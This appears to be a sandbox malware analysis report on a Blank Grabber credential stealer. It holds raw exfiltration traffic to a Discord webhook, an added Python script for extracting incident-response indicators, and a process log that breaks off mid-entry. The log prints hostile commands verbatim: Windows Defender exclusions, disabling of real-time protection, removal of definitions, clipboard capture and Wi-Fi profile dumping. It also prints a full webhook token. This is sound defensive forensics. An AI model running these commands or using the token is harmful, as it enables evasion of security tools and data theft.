2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: e8 5d b3 80 04 49 61 6e 1a 8b ef 5b df f9 5d f1 35 53 88 21 e1 71 9c 2b d5 98 d7 80 c1 fa 8b 18 86 2e 75 a7 cb dc 8e 42 cf 2e 74 00 65 a4 c0 7c b4 c2 89 e6 17 82 65 10 c7 e3 d0 56 74 75 4e 37 2c d9 63 77 06 a5 a0 1b 40 37 5f 26 81 c9 8e 13 5b 57 78 e4 27 61 52 88 8c 18 fc 65 56 3d 3f 83 44 a7 1e 6b be 91 14 96 72 11 a3 e3 29 71 09 f1 1b 38 ae 0f 4b 3e a9 2f 76 df 79 18 23 96 34 42 95 b4 ad ce 17 27 ce 1d 45 44 6f 42 49 47 50 94 cb 99 08 d1 bb 68 15 8e 7a a0 22 24 3e 3c 10 7a a7 71 b0 d2 1a 63 ae 73 0e 1a fe 33 f7 1d c2 97 d3 a9 18 44 f4 2d df c6 89 98 0b 23 e3 1b e6 06 57 15 d1 ae 04 8e 60 95 0c 72 01 fb d9 ee e5 01 9c d3 b2 fd ae ef 34 5a da 1c 9b 60 79 d1 21 77 36 75 e6 b4 88 26 18 ca ec d5 16 85 15 c4 db 72 8d bc 5a 00 a9 8f 57 ed 3b 0f ed 8a 1d 37 f1
                                                          Data Ascii: ]Ian[]5S!q+.uB.te|eVtuN7,cw@7_&[Wx'aReV=?Dkr)q8K>/vy#4B'EDoBIGPhz"$><zqcs3D-#W`r4Z`y!w6u&rZW;7
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: d5 69 03 93 ac 41 8a 4b 9c 42 49 3e 4b bd 34 fd f4 96 33 58 84 28 c3 c6 36 93 6e 64 6a e5 6a 9f ae cc 01 53 6c cc 5f 17 f9 2c 7b 5d f3 39 22 7d 21 28 95 d2 21 2a 0c 1e 0d c8 a6 07 dc 7d 0c 5a 23 ac 73 97 ce ed c2 df 3b 85 ed 86 7f 2f 44 a6 3b a1 a7 e6 4b f9 63 1f 5a db 1f ba 21 82 a3 67 a9 7b 0d 36 8c 79 b3 b8 70 eb 2b a4 eb 9b b9 04 54 92 41 8b 75 c8 1f 5d a3 41 0f 20 cb 05 0e be d6 c9 f4 8e 21 78 aa 77 8c 13 06 d4 ca a8 02 a2 3a 60 58 11 ce 30 f5 83 2b 47 0a 77 d0 33 f7 6f 99 d7 82 83 38 cd e4 80 5b 4a 4d c5 8c 53 9a 55 d8 51 1f 4f 82 bb 48 25 ae 0b 30 0b 92 b8 10 e1 0a 64 cd b7 82 20 dc 9d 9c 4b 7c 2a d1 5d e3 09 53 74 82 fc f8 68 c7 e5 e9 e5 89 bc 73 df d5 31 b6 bc 83 48 b3 80 58 33 37 4c f1 be b7 bc c6 17 ca 01 dd ed 9b 97 0a 53 e7 39 ec b2 91 79 92
                                                          Data Ascii: iAKBI>K43X(6ndjjSl_,{]9"}!(!*}Z#s;/D;KcZ!g{6yp+TAu]A !xw:`X0+Gw3o8[JMSUQOH%0d K|*]Sths1HX37LS9y
2024-05-22 23:36:50 UTC | 16384 | OUT | Data Raw: e6 24 86 7b b5 ba c5 95 2e 4e 7e d1 89 c7 41 25 81 69 4a 99 0e 97 9f da 8e 15 c3 d6 15 aa ef 89 c8 83 3f 24 50 89 11 fb dd 15 00 63 6f 24 fb 3b 89 64 90 fd 34 7e bf 11 5b 6b 2f 65 7f 4f 42 f0 3b 33 49 d2 3d b3 7e 02 4e 00 36 58 9b c0 38 69 e0 12 1d e3 30 38 42 40 d2 74 9d 15 bf 0e b8 97 e3 b1 92 31 44 24 c5 96 50 1c 9b a8 b0 11 9d 6e 78 8d 77 28 81 7d 5d 0e cd b9 fc 46 c3 a9 53 63 6a b5 e8 7a ba cf 1a f4 39 72 0c 62 5a cd 2a 42 8f 54 ce 25 fe 9c 7b a0 de dc a4 fc 44 5e e0 47 8e e8 20 64 66 4a 84 22 e8 5f db 1d cb 8b 44 cb e1 72 a1 bd 2e 65 ee dc d0 3a 0a 53 d8 4b 77 40 fa 2d 4a 53 2a 8f cc 93 93 be 17 de e5 51 82 60 b2 ce db d4 15 8f f5 85 d3 7e 72 84 9c 2a d5 85 d4 a4 58 5f 8d d0 df 15 30 80 70 07 d3 2c 46 b9 4a 82 10 7d f4 32 09 47 1e c7 2f 1d 38 40 20
                                                          Data Ascii: ${.N~A%iJ?$Pco$;d4~[k/eOB;3I=~N6X8i08B@t1D$Pnxw(}]FScjz9rbZ*BT%{D^G dfJ"_Dr.e:SKw@-JS*Q`~r*X_0p,FJ}2G/8@
2024-05-22 23:36:51 UTC | 1365 | IN | HTTP/1.1 404 Not Found
                                                          Date: Wed, 22 May 2024 23:36:51 GMT
                                                          Content-Type: application/json
                                                          Content-Length: 45
                                                          Connection: close
                                                          set-cookie: __dcfduid=29fc2f58189411efae87a23f64d7541c; Expires=Mon, 21-May-2029 23:36:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                          x-ratelimit-limit: 5
                                                          x-ratelimit-remaining: 4
                                                          x-ratelimit-reset: 1716421012
                                                          x-ratelimit-reset-after: 1
                                                          via: 1.1 google
                                                          alt-svc: h3=":443"; ma=86400
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y%2BmkMsbaobPUsvbErmh97aDuEbCzYd7k84OocZ%2BABWTU%2FBBDfv9pr9df88oAyPVoigjlE1Vd3yJ5zGGCJjNugcLyJuaxVg2cilH5uYbmSDjy1xFQnYWf8lDmUz4q"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          X-Content-Type-Options: nosniff
                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                          Set-Cookie: __sdcfduid=29fc2f58189411efae87a23f64d7541c1ac8b801464fa2929075f1c32ed0b4d0638c0aa645c12adb8bb849f0d67dfc05; Expires=Mon, 21-May-2029 23:36:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                          Set-Cookie: __cfruid=a3b0507fedfc396abe2f4a23c0c33288c6dc829f-1716421011; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
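The two HTTP sessions above are the whole network story of this sample: a geolocation lookup against ip-api.com, then a multipart upload of a RAR archive to a Discord webhook that answered 404 (the webhook was already deleted or the token is invalid, but roughly 757 KB still left the host). The following is an added example, not code from the Joe Sandbox report or from the sample, that pulls the indicators an incident responder would record out of those two requests. The request lines, headers, first multipart chunk and response line are transcribed from the rows above; the filename uses the report's ASCII rendering (`Blank-user.rar`, where the hex on the same row carries the real account name). The ip-api.com field-code table and the "scripted client" User-Agent list are my assumptions: the field codes are reproduced from memory of ip-api.com's field builder and cross-checked against the eight keys in the captured JSON response, which sum to exactly 225545.

```python
"""Extract IR indicators from the HTTP requests captured in the report.

Added example; all input below is constructed from the report rows and
nothing touches the network.
"""
import json
import re

# Transcribed from the ip-api.com session (request head and JSON body).
IPAPI_REQUEST = (
    "GET /json/?fields=225545 HTTP/1.1\r\n"
    "Host: ip-api.com\r\n"
    "Accept-Encoding: identity\r\n"
    "User-Agent: python-urllib3/2.2.1\r\n"
)
IPAPI_RESPONSE_BODY = (
    '{"status":"success","country":"United States","regionName":"New York",'
    '"timezone":"America/New_York","reverse":"static-cpe-8-46-123-175.centurylink.com",'
    '"mobile":false,"proxy":false,"query":"8.46.123.175"}'
)

# Transcribed from the discord.com session (request head, first body chunk, status line).
DISCORD_REQUEST = (
    "POST /api/webhooks/1220929699618750534/"
    "zhSTomvYGhmMHwb8qcNrPuGLmzvJ7OZ0dj098Ewa_79bqm5nvJ2v6LXEGk7f3ADrpknC HTTP/1.1\r\n"
    "Host: discord.com\r\n"
    "Accept-Encoding: identity\r\n"
    "Content-Length: 757061\r\n"
    "User-Agent: python-urllib3/2.2.1\r\n"
    "Content-Type: multipart/form-data; boundary=7aed04c08861a53965fd837c5996aad0\r\n"
)
DISCORD_BODY_PREFIX = (
    b"--7aed04c08861a53965fd837c5996aad0\r\n"
    b'Content-Disposition: form-data; name="file"; filename="Blank-user.rar"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n"
    b"Rar!\x1a\x07\x01\x00"  # RAR5 signature, as in the hex dump
)
DISCORD_STATUS_LINE = "HTTP/1.1 404 Not Found"

# Assumption: ip-api.com numeric field codes (from memory of its field builder,
# cross-checked against the eight keys present in IPAPI_RESPONSE_BODY).
IPAPI_FIELD_BITS = {
    1: "country", 2: "countryCode", 4: "region", 8: "regionName", 16: "city",
    32: "zip", 64: "lat", 128: "lon", 256: "timezone", 512: "isp", 1024: "org",
    2048: "as", 4096: "reverse", 8192: "query", 16384: "status",
    32768: "message", 65536: "mobile", 131072: "proxy", 16777216: "hosting",
}
WEBHOOK_PATH = re.compile(r"^/api/webhooks/(?P<id>\d{17,20})/(?P<token>[A-Za-z0-9_-]+)$")
FILENAME = re.compile(rb'filename="([^"\r\n]+)"')
SCRIPTED_UA = ("python-urllib3", "python-requests", "curl/", "Go-http-client")  # assumption


def parse_request(raw: str):
    """Split an HTTP/1.1 request head into (method, path, lower-cased headers)."""
    lines = raw.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def ipapi_fields(mask: int):
    """Expand an ip-api.com 'fields' bitmask into names, ascending by bit."""
    names = [name for bit, name in sorted(IPAPI_FIELD_BITS.items()) if mask & bit]
    mask &= ~sum(IPAPI_FIELD_BITS)  # bits outside the table are reported, not guessed
    return names + ([f"unknown:0x{mask:x}"] if mask else [])


def ipapi_requested_fields(raw_request: str):
    _method, path, _headers = parse_request(raw_request)
    q = re.search(r"[?&]fields=(\d+)", path)
    return ipapi_fields(int(q.group(1))) if q else []


def ipapi_response_keys():
    return set(json.loads(IPAPI_RESPONSE_BODY))


def discord_webhook_indicators(raw_request: str, body_prefix: bytes, status_line: str):
    """Return the facts an IR note needs, or None if this is not a webhook POST."""
    method, path, headers = parse_request(raw_request)
    m = WEBHOOK_PATH.match(path)
    if not (method == "POST" and headers.get("host") == "discord.com" and m):
        return None
    fname = FILENAME.search(body_prefix)
    status = int(status_line.split(" ")[1])
    return {
        "webhook_id": m.group("id"),
        # The token is a write credential for the channel; keep only a prefix in notes.
        "token_prefix": m.group("token")[:6] + "...",
        "multipart_upload": headers.get("content-type", "").startswith("multipart/form-data"),
        "upload_bytes": int(headers.get("content-length", 0)),
        "filename": fname.group(1).decode() if fname else None,
        "rar5_payload": b"Rar!\x1a\x07\x01\x00" in body_prefix,
        "scripted_client": headers.get("user-agent", "").startswith(SCRIPTED_UA),
        # A 4xx from Discord means the webhook is gone or the token is wrong;
        # the upload was still sent, so the attempt is exfiltration either way.
        "webhook_live": status < 400,
    }


if __name__ == "__main__":
    print("ip-api fields requested:", ipapi_requested_fields(IPAPI_REQUEST))
    print("discord webhook:", discord_webhook_indicators(
        DISCORD_REQUEST, DISCORD_BODY_PREFIX, DISCORD_STATUS_LINE))
```

The geolocation request is worth decoding because the field set (country, regionName, timezone, reverse, query, status, mobile, proxy) is what the grabber embeds in its report; the same mask in proxy logs from another host is a cheap pivot. For the webhook, keep the ID in the case notes and report the token to Discord rather than storing it: anyone holding the full URL can post to that channel.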


Target ID: 0
Start time: 19:36:06
Start date: 22/05/2024
Path: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
Wow64 process (32bit): false
Commandline: "C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
Imagebase: 0x7ff7b10f0000
File size: 7'266'369 bytes
MD5 hash: 030C3C535B2D8F10CEAEEDE6E3FE23F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1329466434.00000162E122B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.1329466434.00000162E1229000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

                                                          Target ID:2
                                                          Start time:19:36:07
                                                          Start date:22/05/2024
                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe"
                                                          Imagebase:0x7ff7b10f0000
                                                          File size:7'266'369 bytes
                                                          MD5 hash:030C3C535B2D8F10CEAEEDE6E3FE23F2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1760965599.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1762531034.00000161970DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1765055251.0000016196E10000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1757718097.000001619762A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000003.1759071926.00000161970CF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000002.00000002.1765429469.00000161970E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:6
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:19:36:09
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:11
                                                          Start time:19:36:10
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:19:36:11
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tasklist.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:tasklist /FO LIST
                                                          Imagebase:0x7ff6776c0000
                                                          File size:106'496 bytes
                                                          MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:19:36:12
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:25
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:28
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                          Imagebase:0x7ff629a10000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:19:36:13
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff70f010000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell Get-Clipboard
                                                          Imagebase:0x7ff760310000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:19:36:14
                                                          Start date:22/05/2024
                                                          Path:C:\Windows\System32\tree.com
                                                          Wow64 process (32bit):false
